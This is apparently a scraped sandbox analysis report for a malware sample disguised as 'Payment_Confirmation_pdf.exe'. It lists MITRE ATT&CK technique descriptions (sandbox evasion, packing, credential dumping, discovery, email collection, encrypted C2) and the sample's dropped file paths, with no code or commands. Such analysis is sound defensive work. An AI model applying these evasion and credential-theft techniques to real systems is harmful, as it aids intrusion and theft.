Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment_Confirmation_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment_Confirmation_pdf.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cQwRvD.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\I130O15

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5chkhlyv.0rn.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajhdwqiy.tov.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avgva44b.h4w.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqeinijq.lom.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n0zzbrf5.wl1.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkuwj4uj.oew.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vu1inh2s.hht.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x02cdm1f.wfo.psm1

C:\Users\user\AppData\Local\Temp\tmp6A84.tmp

Windows Analysis Report
Payment_Confirmation_pdf.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre